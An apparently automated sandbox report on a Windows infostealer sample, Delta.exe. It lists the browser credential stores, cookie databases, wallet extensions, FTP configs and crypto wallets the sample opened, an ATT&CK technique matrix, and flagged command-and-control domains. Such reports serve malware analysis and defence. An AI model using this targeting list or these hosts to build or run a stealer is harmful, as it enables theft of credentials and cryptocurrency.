                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                Source: Yara matchFile source: Process Memory Space: Delta.exe PID: 7396, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Delta.exe PID: 7396, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                22
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS22
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Delta.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://fancywaxxers.shop/apig100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiS100%Avira URL Cloudmalware
                https://fancywaxxers.shop/w100%Avira URL Cloudmalware
                https://fancywaxxers.shop/oft.coc100%Avira URL Cloudmalware
                https://fancywaxxers.shop/ll100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api3100%Avira URL Cloudmalware
                https://fancywaxxers.shop/5100%Avira URL Cloudmalware
                https://fancywaxxers.shop/micros100%Avira URL Cloudmalware
                https://fancywaxxers.shop/C100%Avira URL Cloudmalware
                https://fancywaxxers.shop/k100%Avira URL Cloudmalware
                https://fancywaxxers.shop:443/apiUserUserUser100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api:100%Avira URL Cloudmalware
                http://www.microsoft.coc0%Avira URL Cloudsafe
                https://fancywaxxers.shop/3100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                fancywaxxers.shop
                104.21.96.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  fancywaxxers.shopfalse
                    high
                    rabidcowse.shopfalse
                      high
                      wholersorie.shopfalse
                        high
                        cloudewahsj.shopfalse
                          high
                          noisycuttej.shopfalse
                            high
                            nearycrepso.shopfalse
                              high
                              https://fancywaxxers.shop/apifalse
                                high
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabDelta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://fancywaxxers.shop/apigDelta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fancywaxxers.shop/apiSDelta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiDelta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0Delta.exe, 00000002.00000003.1740469289.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallDelta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
